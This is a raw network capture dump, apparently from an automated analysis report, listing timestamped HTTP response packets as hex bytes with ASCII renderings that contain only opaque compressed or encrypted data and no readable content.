                                                                                              2021-12-13 23:57:11 UTC1256INData Raw: e7 eb 40 dd 78 20 9a b5 85 de 9e c8 87 e7 c9 23 9c ae 87 91 ae 8b 78 67 6e 6c 64 48 80 4f 87 5f 61 95 76 02 bf 1a 57 61 92 f6 96 2a e5 48 c5 8f 9f ab 98 36 af fb 0e 56 77 cd c7 9c 1b fc 74 5f 42 95 6c fc c0 86 b4 53 09 aa fe 9c 1f b4 e8 9c 50 c5 f0 0f 3a ac 06 79 fd f1 9d 40 f4 49 8c 70 61 46 f8 3d 70 98 d3 b9 f7 5f 40 e7 df 65 3a c7 8f 97 cf ce 55 b8 92 54 32 db 00 99 5b 04 8d c5 72 96 b1 17 3f 89 15 f1 36 03 ab cf 4e 2b 3e 64 68 bc d2 90 f8 fb 19 58 8e 0d d9 fe 77 b5 21 dc 63 e6 06 46 b8 57 c7 4b 99 f3 6e 14 1c 4d b5 b0 08 b5 31 7b fe ce 7b d7 4b 4f c5 57 31 7f 2a d3 61 f4 0a a9 60 5f 60 a6 8f 7c c8 41 f4 2b ff 84 26 9c 91 9b 00 84 15 c5 1a 51 31 90 fb bc 30 b6 79 48 e6 3c 93 e0 08 c7 25 a0 9f 07 de 05 fd 3b 5f b3 42 fd 92 c4 17 89 7e 85 96 c8 10 79 1d
                                                                                              Data Ascii: @x #xgnldHO_avWa*H6Vwt_BlSP:y@IpaF=p_@e:UT2[r?6N+>dhXw!cFWKnM1{{KOW1*a`_`|A+&Q10yH<%;_B~y
                                                                                              2021-12-13 23:57:11 UTC1257INData Raw: a7 4f f1 d3 36 88 c7 d0 f8 32 be ef 58 8b 4b 94 0b 41 74 e7 82 12 65 da 3e 28 e3 b4 55 d4 a5 ad 76 bd 8e b6 ed 13 03 68 bb b0 5e 47 5b ba 9e 82 9f 18 05 3e ee a8 7c ec 02 a7 c0 73 46 a5 40 bd c7 03 fd d7 ff e1 9a 5c 8c 5a 02 d6 6f f8 52 a9 3f 6b 90 77 b4 72 ce f6 e2 83 53 05 9a 1b 2b 08 af 63 18 39 cd d9 6c ae 8d 0d 57 6f 48 d0 6f 20 24 38 d3 17 c7 d4 95 5e e3 4e aa 71 c3 da fa de f4 32 89 1c 51 52 8f b2 c0 82 f6 8c f2 d6 78 10 4f eb 87 84 68 27 e7 32 61 9f 29 e8 ac 1a e1 4a f7 42 2f 63 11 d3 a1 88 72 2b 1e d3 2c a2 51 9f 21 97 fc c3 65 2d 2d b4 5e 6c e1 4e 2a 86 d5 c8 c8 c2 8a 5d 56 5a 68 ad 68 81 08 73 6a 08 69 66 3e ac f9 a1 be d9 e6 82 44 df 39 a3 f3 ca 35 7d 89 7d 53 cc af 6b f9 e8 3c ef 9b b7 4e 97 a8 67 a1 f8 f8 68 67 0e b7 b9 26 6f 41 30 1b fb 67
                                                                                              Data Ascii: O62XKAte>(Uvh^G[>|sF@\ZoR?kwrS+c9lWoHo $8^Nq2QRxOh'2a)JB/cr+,Q!e--^lN*]VZhhsjif>D95}}Sk<Nghg&oA0g
                                                                                              2021-12-13 23:57:11 UTC1273INData Raw: a1 66 7a 4e 4d 57 75 fd ea 3d 6f 9f ce c3 39 7f 6d 3e ca f9 1a 0e 18 03 ae ff 0e 4c 9e 11 3c 5b 0c fe 2e e8 9f 74 4f 6d 2e 81 8d 47 1b 61 6b 74 69 1b 01 36 0e 30 92 c7 c6 fb 8d f0 fa 57 6d b4 f5 af 8c 88 6c ec d3 03 67 e3 0b d1 e2 6c 1c 13 dd 14 36 de 17 2d 52 ff ea 43 31 36 ce 8f 86 f5 af 5a 83 2b 95 fa 03 09 36 ee f8 21 dd 89 ee 4e 8a d8 78 6c 2e cb c6 9f e4 22 6c 3c 28 57 88 8d 4f 6f 17 63 63 d3 9d ca d8 d8 7d 37 c6 c6 0b 62 5a 8e 8d c7 ed c6 d9 b8 ca 17 65 e3 7e 9b e9 15 e5 4d 12 c7 c6 05 be 90 8d 2f c7 08 b2 f1 e4 dd 00 02 b6 f8 82 93 b0 b8 2b ce c6 09 66 0a d8 78 96 a1 18 1b 47 1b 12 d9 f8 23 43 6c 8e a4 e9 d1 6c dc f1 43 09 36 1e 65 48 64 e3 5f db ca 60 e3 86 b6 82 6c 3c cc 90 cf c6 af 2f b2 6c 7c fb a2 10 1b ff d4 56 31 1b b7 76 a4 21 b6 c4 94 c8
                                                                                              Data Ascii: fzNMWu=o9m>L<[.tOm.Gakti60Wmlgl6-RC16Z+6!Nxl."l<(WOocc}7bZe~M/+fxG#CllC6eHd_`l</l|V1v!
                                                                                              2021-12-13 23:57:11 UTC1274INData Raw: 83 a3 cb cc ff 3b 8a 90 6a b7 28 fa 7a d2 fa 19 8f 54 27 cf 15 62 e6 61 73 39 66 de 9a 8a 40 ea 9d a3 00 52 df ce 01 90 fa 7c 0e f8 21 4b 0c 88 cc ec 95 88 44 52 b9 95 8e 64 4d 0d 2f 92 ec 39 2c 33 a7 cf d1 61 e6 c4 39 1c 33 37 a6 20 e1 2c 49 04 e1 2c 83 e1 78 c3 70 26 19 c8 f0 44 c5 ef 62 7d 02 3a 8c d5 99 b9 1b 9f 79 47 08 7c 07 7c 69 17 8d 7a a2 86 c4 b3 dc ac 1f 87 7b a2 98 69 42 af d1 f4 91 8c 99 3a a2 60 d9 9c 1c 46 83 f3 7b da d7 ab c3 58 e7 13 e3 29 50 45 96 d0 d8 dc 0e c4 60 1a 35 45 53 6d ae 9d 26 50 53 95 71 98 06 9c 3b 32 b0 c2 3c ca 04 f4 22 bc 8d 06 60 c6 d2 e4 dd 4d 73 bd 64 6e f8 c3 96 c1 b0 60 6e 19 a4 8f ad 59 08 67 80 03 83 23 75 64 8f 64 a8 39 d2 04 7d 16 b1 67 1f aa 68 84 95 04 34 1e 8a cd 5a be 36 4e 02 ff e7 ee 2f 84 88 dd 13 7e 97
                                                                                              Data Ascii: ;j(zT'bas9f@R|!KDRdM/9,3a937 ,I,xp&Db}:yG||iz{iB:`F{X)PE`5ESm&PSq;2<"`Msdn`nYg#udd9}gh4Z6N/~
                                                                                              2021-12-13 23:57:11 UTC1290INData Raw: 30 05 0a 3e 97 95 91 77 6f 5d b3 12 5f 5d fb 9c 83 af b4 07 70 26 44 9d 52 c1 57 5a 86 2a f8 2a ed 14 07 5f b9 dc da f8 ca 7a 4a 0d 5f b9 dc 41 ee 0b 5f 70 4a 8e af a8 db 43 6a cc 54 a8 39 25 65 56 d4 44 cf fd a0 ed 94 3f a8 a2 25 02 47 c1 02 c6 0e 2e 9d 72 b9 83 a4 53 51 1d 0a 3a e5 72 0f 61 5f f8 84 0e 1f 9d 62 6d 50 8c 52 13 58 3a bc 48 4a a5 cc 44 28 ef 50 72 28 59 a1 58 58 d5 21 e1 50 f4 2c a7 d4 a3 50 d7 c1 e5 50 da 5d 32 15 dc 1d 3c 0e a5 6d 95 05 97 3a d4 38 54 d0 63 69 06 c4 9c 56 e3 50 da 6e c4 c1 e4 d3 3c 0e a5 e8 09 f3 69 19 63 e2 84 6f f1 69 59 19 de 43 5f c9 a1 56 9f 56 e5 50 3c e7 d5 39 54 e3 69 55 0e a5 bf 22 d1 49 25 87 ea 3f ad c2 a1 64 51 48 12 5f 9b 7d 1c 6a da 3c ce f4 34 4f 9b 27 e5 50 91 9d 4a 0e 45 17 26 9c ea a7 c2 15 b7 94 43 e9
                                                                                              Data Ascii: 0>wo]_]p&DRWZ**_zJ_A_pJCjT9%eVD?%G.rSQ:ra_bmPRX:HJD(Pr(YXX!P,PP]2<m:8TciVPn<icoiYC_VVP<9TiU"I%?dQH_}j<4O'PJE&C
                                                                                              2021-12-13 23:57:11 UTC1291INData Raw: d1 40 ea a9 a2 ab ad ae 42 e9 5e b5 2b 3d 5e 30 18 b8 f8 44 68 fa 4a c9 08 65 b3 24 16 da be 92 30 42 7a 96 53 ea 51 e8 ff 8a cb 08 b5 27 c6 54 88 ea e5 31 42 6d ab 2c 98 dc ab c6 08 83 9e 4f 33 60 71 af 1a 23 d4 76 23 0e 56 f5 f2 18 a1 2c 34 26 a8 ee 95 f1 3f 4e f8 1a 7a 65 65 78 ef 0a 9c 7f 3b a2 57 95 11 f2 9c 57 67 84 91 17 54 19 a1 fe 8a 44 27 95 8c 30 f3 82 0a 23 94 45 21 49 7c fd f6 31 c2 9c a5 9c 11 6c ce 59 2a 65 84 45 17 94 8c 90 ae 77 38 d5 a7 40 54 97 94 11 06 7d 7b 48 07 73 17 0f 17 06 f5 60 07 71 bd 12 7a 63 de 4d e9 d2 a8 7b 99 2e 80 b8 fe 2b 71 cd b5 93 49 17 93 bf 32 89 ee 15 65 7a af 2a 40 ec e8 14 a0 af 33 20 40 34 76 f1 01 22 a5 21 0d 9d aa 00 71 31 79 41 68 ef 54 07 88 0d 27 02 02 44 5c 75 0d 6e e8 52 05 88 79 a4 79 e3 7e c8 fa 41 3b
                                                                                              Data Ascii: @B^+=^0DhJe$0BzSQ'T1Bm,O3`q#v#V,4&?Nzeex;WWgTD'0#E!I|1lY*eEw8@T}{Hs`qzcM{.+qI2ez*@3 @4v"!q1yAhT'D\unRyy~A;
                                                                                              2021-12-13 23:57:11 UTC1307INData Raw: c7 f9 ab 8a b1 9b b4 aa 8a 31 95 c4 45 26 46 4a 40 8c 64 15 31 26 2b c5 18 97 e2 96 91 16 d8 9b e8 71 23 88 3b b9 28 da c5 40 a2 83 c5 a5 bb 56 0d d1 f1 cd 2c 0c dc 77 1d ca 1b bd c8 52 25 db ba 3e c4 d6 17 90 52 08 3c 71 0b 6c 7c af 1b c5 67 8f ba ac 25 f3 f0 15 88 44 f7 d1 0d 52 3c b0 c9 af 71 99 1c 35 f8 c0 d4 07 32 47 7a 84 91 7d 5b 8c fd ce 22 97 b4 63 d0 83 41 2c e8 e1 bf 31 67 76 9d 0c 9e d9 41 7a 47 30 49 22 31 91 30 a1 d8 18 d4 b1 d1 07 63 a3 85 cd 44 d7 bd b0 6d c7 f9 b0 5a d6 9a af 3c 53 2d 4a dc 43 86 a0 f7 04 e8 8d 5a 1f a3 f3 cf 89 6b 01 d8 25 74 96 b7 ea 0c 8d 11 41 62 2c a0 99 5f c4 c8 b9 70 cb f5 b8 bc 38 b4 9c 3c bb 65 b5 73 14 53 68 26 6d 1c c3 82 6a 27 8a c0 66 1f e1 9c 84 7d b7 48 8f bd 2c d5 56 1b 97 47 1b 2a cf e4 71 ca f3 4b d2 7c
                                                                                              Data Ascii: 1E&FJ@d1&+q#;(@V,wR%>R<ql|g%DR<q52Gz}["cA,1gvAzG0I"10cDmZ<S-JCZk%tAb,_p8<esSh&mj'f}H,VG*qK|
                                                                                              2021-12-13 23:57:11 UTC1308INData Raw: e7 6a a4 27 cf 9c 44 89 11 09 13 d2 2c 76 37 1d 75 25 7a 1e 80 a1 c2 0e 3c da 26 8d 5d 06 b1 1b e4 5a 2c 0e c2 72 65 de ef 3b 81 f7 d7 c0 7d 28 6d 3f f0 ef f1 7c 9a 07 fc 9f a5 fc dd eb cc 62 ae de bd c0 28 f6 30 9e 3d 94 e7 57 ce 20 9e 3d b0 d8 47 df 8f 26 a6 62 cf cd b2 a0 1d ee 67 10 27 f7 33 4d 28 51 9e c3 93 56 05 2d dd 9e f2 28 bc 74 79 52 f1 32 6f bd 27 05 e8 ee e1 db 0e 41 d3 ef 61 de a6 a3 9b 74 50 dc 04 13 80 a0 db 33 08 c8 5a 49 4c e2 91 b4 8e c5 e5 2b 61 a7 27 48 b3 04 f7 54 31 db d8 38 a4 a9 9f 30 1f 8d e1 e7 b1 8d 1b cd 9a 27 6f dd be 78 f8 37 de fd eb 88 c7 78 1a 78 17 0e ef d6 fc e6 c8 b6 02 e2 79 ea 9d e3 92 67 e7 53 c7 a4 9e ec 12 74 d0 ee 6c 8b 66 b7 56 ec f4 94 4d c1 0b 2b e9 c9 16 50 ef 3d d9 e5 48 ba b3 ed a4 bb 11 8f 3c 35 c0 61 d6
                                                                                              Data Ascii: j'D,v7u%z<&]Z,re;}(m?|b(0=W =G&bg'3M(QV-(tyR2o'AatP3ZIL+a'HT180'ox7xxygStlfVM+P=H<5a
                                                                                              2021-12-13 23:57:11 UTC1324INData Raw: e9 4d 10 dc e2 ef 28 d2 de d2 1c 47 4c 3f 53 59 01 3d 7d 15 57 8f 9d 52 b7 c7 d2 e0 af ae f3 5c e0 22 c6 70 37 9c 6f bc ca f8 4a 1e bf f0 63 fa 68 26 a5 0f c7 f4 65 22 7d a0 8b cf ed c0 a4 18 17 7f bd 0b 2e f4 4f 35 2a 07 60 5e 1e 3b 1f 46 d1 fb 87 f0 1b 7a 79 c9 2d 8a d3 d3 11 a5 cc f6 54 1f f2 0c f4 ed be 8b 1a 17 84 1b ab f2 47 bc e9 88 e3 d7 9f 45 af ce 45 29 f3 f2 e5 d9 91 8d fb ad f8 e1 ee df 7c 10 50 fd d5 78 59 cc 6a 29 c4 9d d7 71 7c fd 61 7c 25 cd 33 9a 54 ab 53 79 b0 15 52 fc e2 03 53 56 e5 c1 36 71 17 3e 23 b2 99 00 bd df 51 87 08 e1 9d dd 11 08 01 41 a7 c8 d9 89 57 8f 1e 79 0f fb 4e 29 83 b5 e2 51 7c 5b 03 9f 70 e0 7e af fc 30 21 ee f7 5b 1c 01 30 37 e2 41 92 6d c7 ec 6c db 8e 84 f8 da dc 23 86 c7 1d 8e 23 c2 48 70 9e b3 52 7b d6 f1 e7 df 9e
                                                                                              Data Ascii: M(GL?SY=}WR\"p7oJch&e"}.O5*`^;Fzy-TGEE)|PxYj)q|a|%3TSyRSV6q>#QAWyN)Q|[p~0![07Aml##HpR{
                                                                                              2021-12-13 23:57:11 UTC1325INData Raw: 2a 0e 6d c0 cd 3b 46 12 84 a9 81 46 5b 8d e3 30 0a 10 c7 59 9b 7c 3a ec 39 b7 d6 75 00 df cf da 87 83 ec 00 f2 eb b4 d7 3a de e4 15 03 61 78 0d 81 2b c5 45 03 0b d7 b2 80 73 0e db 76 5a 1c ef 13 86 3f 60 87 df 98 42 40 da f0 b3 d8 76 d6 d5 ba 82 b3 8b 99 53 c9 85 3c 1c 7b e3 99 43 38 46 42 49 8e a0 af 2e 06 df 12 30 e3 80 10 1a cd 60 9d f4 0a 69 a1 5f 8f ed c4 58 2b c5 d2 b0 68 03 08 b5 9d 50 c8 b9 0a bd bc 60 05 f4 d4 a6 e4 72 e4 c9 f7 02 a1 a7 6d cc 70 7c e0 f6 97 51 3f 0f 88 23 b2 53 bf 13 4a 9a f2 25 28 69 bb f6 aa 6d 2f 1d dd 66 aa df 74 ad 73 9e 27 b6 c6 39 4f ec 41 38 b5 77 cb d3 ed ca fb fc 69 10 84 67 58 2d 5d 7b ba 5b d4 ed 26 f1 e1 2a a7 fc ee 71 b3 b2 d6 03 c6 ea 57 60 a9 96 41 99 59 d5 75 eb 2e b7 fb 1b 92 55 25 dd a3 7c c0 17 43 5c 4a b3 67
                                                                                              Data Ascii: *m;FF[0Y|:9u:ax+EsvZ?`B@vS<{C8FBI.0`i_X+hP`rmp|Q?#SJ%(im/fts'9OA8wigX-]{[&*qW`AYu.U%|C\Jg
                                                                                              2021-12-13 23:57:11 UTC1341INData Raw: 1b b5 86 28 d4 f3 c4 90 b8 f2 c7 81 eb 6b 10 41 f3 cc 8b 9c c9 e7 8b 0c e6 ac 51 ae 4c b3 62 24 0c c2 21 e8 de fe d7 b8 25 88 7d 01 b4 24 d0 30 a1 10 e3 cf 82 f8 89 ff 15 d9 fd a3 45 76 95 5f c1 d3 76 b9 bb 11 58 ff 66 a9 8a d1 0e 9b b8 81 24 fa 52 5e 76 a4 6e 06 73 3c 1b 90 ea fe 33 32 c7 8b 84 5d 3f bc 23 ca 7a 40 19 f5 74 ad b0 bd 6e 74 af b8 18 3f 6d 19 9c df a0 f0 f6 aa 78 46 c3 ac 7f 10 da f8 60 d4 35 ba 31 90 57 b3 7b 21 5e 4b 5b 0b 1c 46 e6 28 d8 5d a2 66 f4 25 8c a2 6f f8 2d 10 bd 0e 7e ab 6e 08 f7 c1 58 c3 6c 04 31 16 e1 b2 18 1f 59 e7 4b 45 3a ef ce c8 a4 25 e2 e1 c6 09 e2 e1 a4 5a 4b 1b 7d 38 92 19 18 2f d2 0c 3d 57 22 1e ee 32 61 e2 e1 70 8a a2 a9 80 e7 bc 5a a1 9a a6 68 8a 6e c3 92 88 77 9b 20 0c de cd 7c 9f c6 54 99 98 fb 34 52 b5 a5 1d 47
                                                                                              Data Ascii: (kAQLb$!%}$0Ev_vXf$R^vns<32]?#z@tnt?mxF`51W{!^K[F(]f%o-~nXl1YKE:%ZK}8/=W"2apZhnw |T4RG
                                                                                              2021-12-13 23:57:11 UTC1342INData Raw: 42 91 29 b1 8a 50 f1 8e 68 4e 40 71 46 a1 d5 19 68 65 8a fb 36 a5 04 6a d7 05 e5 75 45 95 59 6f 94 59 ee bb 8d 6a 76 04 30 8e 44 61 dd 22 d2 24 56 55 d3 8e db a1 4b a1 30 57 54 81 8b 8c 02 49 3f b1 be 15 7a 15 50 aa a3 d0 e0 d8 63 46 c3 96 22 ea 3c 40 9b 17 85 ba 58 64 9b 51 ab 9a a4 a9 86 56 17 35 1f 1a 45 aa b4 dd 40 8c 7e ac 7c 54 03 7c b8 90 99 28 48 db 0e ad 29 6a ce 34 e1 70 eb aa 1d 69 e9 a1 b5 44 95 74 2b 4e 2c dc 69 b7 b4 d4 a0 7c 4c 13 51 75 6e c6 fe ac 08 00 37 87 8b a1 1f d6 67 1d f2 df 51 13 dd 8f d5 a9 a2 15 da 20 ac ef 4f 27 01 b0 bd 8c c0 a5 0c aa 18 2c 27 90 f4 da 95 04 3e 65 70 fa 55 04 2e 67 70 03 83 95 0c 7e c3 e0 00 83 cf 18 0c 9a 4c 60 12 83 9b 18 ac 60 f0 24 83 d7 18 9c 60 70 da 14 02 53 18 2c 64 f0 00 83 3f 33 78 97 41 ca d5 04 2e
                                                                                              Data Ascii: B)PhN@qFhe6juEYoYjv0Da"$VUK0WTI?zPcF"<@XdQV5E@~|T|(H)j4piDt+N,i|LQun7gQ O','>epU.gp~L``$`pS,d?3xA.
                                                                                              2021-12-13 23:57:11 UTC1358INData Raw: 6f 32 a9 e7 f1 a9 99 3e 38 5d d7 10 5d 4f aa a3 43 cb d8 6f 75 a3 46 7e 26 70 35 b3 ad 37 84 59 15 8f ff 96 1f 98 7c 37 f0 e9 fa e0 d1 d6 b2 45 d7 54 b9 1e 8d a5 56 0e 50 94 a0 b2 72 81 a0 5c 41 25 a8 d5 c8 12 95 98 12 dd 3b f9 71 2d 1a 8d bd 71 e9 26 1b 25 53 a5 29 31 c2 ba f5 5f 78 bf 8e e0 64 c3 e2 f6 c9 11 a2 65 5c 72 c4 e2 ce 81 ee 95 15 42 20 06 8f ae 47 17 08 09 15 81 b6 10 b4 50 90 70 8d 4b f4 32 23 d1 b6 b4 2b da 95 46 ad b4 a2 7a 31 5a 9f 52 d0 20 60 12 05 cd 02 9a a2 b6 59 39 99 3c 1e 72 69 b9 d0 56 a5 ef a8 87 1c 2c 41 8d 22 2c 7b 24 dd f8 5b 8b f7 09 bc 5d 5c 03 00 75 d0 2e 11 6b 56 fc 21 de 82 a4 c6 47 8b 31 f8 97 1f 0c e9 62 a6 78 1d de 0d f0 5b 6c a9 ad 7a 93 24 16 a2 ae da 85 20 49 59 86 c3 da 24 3d e6 0a 96 71 81 af 82 eb 38 c8 ec 9f 04
                                                                                              Data Ascii: o2>8]]OCouF~&p57Y|7ETVPr\A%;q-q&%S)1_xde\rB GPpK2#+Fz1ZR `Y9<riV,A",{$[]\u.kV!G1bx[lz$ IY$=q8
                                                                                              2021-12-13 23:57:11 UTC1359INData Raw: 25 fc 7f d5 d3 1d f9 7c 2d d1 88 2c 34 85 ae 93 2c 3a 97 6a 14 3b b9 af 18 a5 7c 1d 20 48 73 21 5c 42 f8 ba bc a6 8f 7a 6d 79 fd 79 4e 30 ac 10 cf eb 12 21 84 96 82 5e 9e 75 2d 1a f8 ca 26 ef 7c 32 77 82 4c dd ff c4 de 7d f8 bd 3a a5 fe 3b a4 8e 57 0c 52 57 c2 af a3 ea 54 19 e4 9f a6 50 7d eb ca 87 19 4a 5a 8b 28 47 75 b9 40 f7 a9 cf fc a0 b1 38 7f 27 a2 b4 6e 75 d7 72 16 a0 e4 45 0c b8 af 44 88 a6 51 11 52 6f aa 2f 9e ea eb 4c 67 ba 48 ba 0d 83 d0 8e e9 28 c6 ba a2 aa fd de f6 41 50 c1 06 aa b5 56 d6 87 89 0d 5e f8 a1 b5 fc f2 9d ce 5c 7e d9 eb ab 30 f9 a5 7a df e6 c1 a3 9b ad 41 ec 0d ab bb 8d 7c 98 dd f2 22 f0 79 95 3e 0f 82 55 d0 bf d7 69 f7 70 dc 67 86 fb 33 be 18 16 78 3e e3 8b 61 36 4c 7d 6f 83 96 01 16 fc 38 b9 21 45 91 bd cd 2a 88 9d d8 d4 82 d2
                                                                                              Data Ascii: %|-,4,:j;| Hs!\BzmyyN0!^u-&|2wL}:;WRWTP}JZ(Gu@8'nurEDQRo/LgH(APV^\~0zA|"y>Uipg3x>a6L}o8!E*
                                                                                              2021-12-13 23:57:11 UTC1375INData Raw: bf 87 a1 1b 76 f2 de a8 e7 7d 83 8f 7a 90 b9 c4 19 8a 06 b4 68 39 bf 02 ca 1d 4c 3f 5d 6c 98 f8 2c 1e 14 f5 0b 9c 9f 26 5d 7b 81 43 fc c7 64 58 87 e3 85 29 f4 46 c2 9d f0 2b a8 3e e6 ce b0 96 49 74 a3 d3 00 5d 7b 18 4e b0 3e 31 d1 04 d4 9f 66 0f ce 25 59 b0 99 12 25 0b 85 d5 0b 07 40 b1 a0 ae 13 ce 23 9a 55 80 03 51 c9 42 11 15 49 5e 8d 6d 85 de 8b 72 b2 ec 01 75 4a e5 6a 1c 6f 5c b7 43 87 90 06 08 9c 49 07 0a 02 5d 5e 54 32 47 9f 53 8a bc ba d4 c0 9f 95 60 c3 c7 2b 4a 56 5e f1 ac 5c c4 ef de 0b b2 ad 2e e1 69 85 ee 9d 7b 88 9f 59 22 c7 92 97 b1 91 82 68 d5 bd 8c 39 59 da b0 3a 65 fd 1b 55 4b 05 cf 88 c8 15 31 5a 48 ea ba 9e 7d 85 21 43 a1 85 17 e5 64 6f 0d d7 31 a3 74 cc 28 c9 aa 62 0a 85 91 ec eb ed e7 14 0d dd 06 3c 82 a7 68 9e 20 9a fd e9 f3 58 87 f7
                                                                                              Data Ascii: v}zh9L?]l,&]{CdX)F+>It]{N>1f%Y%@#UQBI^mruJjo\CI]^T2GS`+JV^\.i{Y"h9Y:eUK1ZH}!Cdo1t(b<h X
                                                                                              2021-12-13 23:57:11 UTC1376INData Raw: f6 4f 8d 9a 80 fc 6d b8 fe 54 c9 e4 2b 9a 28 c2 5d 46 9b 9f 38 2b 93 5d 49 a6 d3 cc 54 7a d1 ba 4d 65 64 9c 7d 29 17 a9 3f 9d 13 12 46 64 b2 e0 a0 b0 35 f6 3c 24 85 e3 93 9c b6 77 a6 ea 29 ba d2 fd 2c 16 ae cb 78 c8 de 42 c2 85 90 6f ca 62 75 49 75 dc 67 00 37 69 b7 3d 4f 6e 34 2d 7e 47 b3 33 93 75 84 c6 90 b9 3a f0 c3 2f 26 c0 9c 77 34 4b 03 d5 f9 ba 89 cf 57 0f 7c ac b7 7c 79 e7 d6 d0 fa 5d 00 ad b3 16 af 42 86 21 cc 3d a7 14 56 89 94 67 93 2c e2 bd 59 2c 8e 7f f2 0c b5 88 06 2c a2 46 d7 63 4c cd 24 78 24 82 3f 21 16 21 76 dc 7d 0b 04 76 bd 1f 37 13 53 58 26 5d 1f 4c 7d f8 ed 19 04 fa c4 55 cd b4 8c 34 7d 3e b4 cd 6f 50 af bc 69 bc ad c5 4e 7a 7d dd ea 45 b5 3d cf ce 8f f9 de e3 e1 bb 7c 15 ec f2 ce bc 0d d0 c3 6c d3 40 dc 3a 73 04 71 54 2b 0a 32 58 5e
                                                                                              Data Ascii: OmT+(]F8+]ITzMed})?Fd5<$w),xBobuIug7i=On4-~G3u:/&w4KW||y]B!=Vg,Y,,FcL$x$?!!v}v7SX&]L}U4}>oPiNz}E=|l@:sqT+2X^
                                                                                              2021-12-13 23:57:11 UTC1392INData Raw: db 1a 56 dd e3 a1 ea 8e a9 d5 fd 28 bb 8e 85 aa 1b 0a d5 05 66 b7 fa e8 29 61 a5 cf cd bf a6 e7 1f 0b 2f 3d 3e 54 7a 8d 5a 7a ad ec aa 09 95 7e f8 13 94 94 aa fe 73 2d 02 09 2b 0b cc b8 c5 dc 35 57 bd 6b 93 eb f1 89 05 f9 4b 72 93 74 f8 84 42 8f 99 9b d2 c5 71 10 4d fb 0d 75 6d c3 75 82 32 b9 9e 4b d5 b9 ab 48 e9 51 6a 9a 8c 38 99 a6 b0 a3 33 57 7f 20 5d 96 57 3b b6 28 ee 1d 9c af cb 57 eb e8 09 75 f8 52 87 c9 a9 c3 70 08 27 d8 48 35 50 1a 1b 52 11 44 3b 4c 6c 47 ea 30 bf c9 2e a7 55 8c 42 b6 a0 8d d8 71 9c 18 13 e8 8f ef 29 c1 c1 21 80 ee c0 66 60 a0 0b 04 9e c4 40 bb 50 09 e1 ba 2c 9e 3d 35 ad 3e b1 e1 57 fd 13 db 93 1b 80 5b 61 84 03 79 5a 2b ef 02 c8 ae a3 34 e6 d3 39 73 58 c1 a6 42 1c f5 bd 2d 4e 0d 72 07 40 d4 63 9b 73 75 ad 92 ed 17 13 2d fe c2 ff
                                                                                              Data Ascii: V(f)a/=>TzZz~s-+5WkKrtBqMumu2KHQj83W ]W;(WuRp'H5PRD;LlG0.UBq)!f`@P,=5>W[ayZ+49sXB-Nr@csu-
                                                                                              2021-12-13 23:57:11 UTC1393INData Raw: cc 19 1d b1 1f d9 9e 6e 50 1a 8c be 11 5c bb 8e 18 bc 23 10 67 d0 db 8b fa db 7a e1 ef 80 8d f8 bb d8 36 1a bb ac b6 bf b4 b2 e7 8f f3 56 46 e3 61 dd a3 55 87 ac ad 9e 41 37 c7 9b 60 7d 56 e7 37 a5 cb b5 86 d3 ec da 6b bd 70 09 d0 5a 68 32 57 fd 8d cb 63 6d c2 4d 9f b7 ce c5 ab c8 2a 16 db 3c 1f 18 65 6f 58 f7 d9 d0 d6 fb eb fb 9b d5 51 74 2c 1b 99 d4 16 9b 74 b4 34 fd 22 c8 4f 02 b2 39 e9 b4 19 6d df b7 94 8e bc 08 66 e1 fd 68 b8 ed b4 6b af e4 11 f5 60 5b bf 45 d7 92 e2 04 ed ae 9f 3b 51 6e 88 9f 06 9f 76 a4 5d a4 29 ad 75 78 0d f3 76 4d 33 3f 5f 67 2f 7f ab aa fa b7 90 2a bf 95 0b 90 6f 0b 0f 6a 7c 1b f3 b1 72 8a 33 d8 2d 5f 08 1b 9c fd 95 26 f6 c5 c9 df 54 db f6 ac 79 cc 1a 70 4e f5 0c ca 97 32 f3 fa 69 1f 67 28 fb fc 34 76 b6 e7 de 32 18 83 7d e6 20
                                                                                              Data Ascii: nP\#gz6VFaUA7`}V7kpZh2WcmM*<eoXQt,t4"O9mfhk`[E;Qnv])uxvM3?_g/*oj|r3-_&TypN2ig(4v2}
                                                                                              2021-12-13 23:57:11 UTC1409INData Raw: 1a bb f5 e3 80 31 8d da d8 dd 69 e3 34 f8 6b 91 06 7f 6a e9 4f 1a aa a3 3f 75 f5 87 f4 d0 a7 c4 ee 86 2c 69 11 59 13 16 22 00 bc a1 7f f7 32 c8 90 3b 26 eb c0 65 7d dd 25 5d d4 41 bc 9d 3e ce 67 f1 37 ea a3 68 fa 64 0d cb 10 7b e0 a2 9e a5 d7 f2 f4 da ba 4b b1 8a f4 69 51 1a 96 41 cb 32 e8 0e 5c 8c 60 19 74 34 43 dd a5 85 aa d4 da 7a a3 5f 87 84 3c 31 5b 14 c5 ba 8d d7 48 4d 3a a8 45 6a ec 5b 8f 9e a0 94 e5 8e 13 4b 92 0e d6 4c c7 5f d7 f1 97 e1 6d 94 5b e7 90 b7 d9 1e 91 ee c9 87 c2 d9 d3 7e 3f 65 4f 68 f8 53 45 07 cd 3c f6 ff 78 7b fe b0 a8 aa 6d 17 30 30 a3 02 33 18 26 2a 15 15 25 5d ad 6b 69 8a 69 37 70 60 82 1a 8c 04 14 bb de f7 9c 60 18 b8 17 01 99 41 c0 08 bd a1 5d a6 23 85 a9 37 2d 54 2c eb 5a cf f7 a5 3e 9f 12 d7 d7 1d 5f 68 96 e6 a3 f2 f5 41 7a
                                                                                              Data Ascii: 1i4kjO?u,iY"2;&e}%]A>g7hd{KiQA2\`t4Cz_<1[HM:Ej[KL_m[~?eOhSE<x{m003&*%]kii7p``A]#7-T,Z>_hAz
                                                                                              2021-12-13 23:57:11 UTC1410INData Raw: b1 ac f6 1c 4d 41 f7 e8 0a 3a 51 14 34 8e 0a 8a c5 54 62 bb 58 53 bc d1 19 60 78 31 36 46 2f b8 d5 7f 51 a5 cb e7 9d ef 6e f2 a9 96 21 1c 62 d1 d6 c6 9a 6c ef 6f 8a 2b dd 85 f5 b5 9e 7a d7 b2 31 8d 35 39 b5 e2 94 8c b8 c6 1a 3c 23 c3 c6 d3 bb 6b 7c 55 65 2e dc bd 48 84 55 d7 18 e2 c5 6e f6 bc ab d9 03 fb 18 b4 35 f1 f0 f9 0c a6 20 2f be f8 e3 f7 2c 6e 7e d4 43 bc 78 71 86 93 78 11 d7 fe ba 56 79 60 2e fb 55 b3 df 54 16 1f 68 f5 c0 b1 56 be 2e b8 a7 d5 63 d8 37 68 0b 96 c9 c4 b7 fa 99 b8 fd d0 50 8f e7 df 14 f9 dc 75 cc 4e c0 1d 3c 16 5a 45 54 37 c7 50 10 7a 33 8d 71 60 55 83 c1 6a 96 16 07 ea ca 5e b7 8f 2f 38 2e 6d 42 99 6c 86 c7 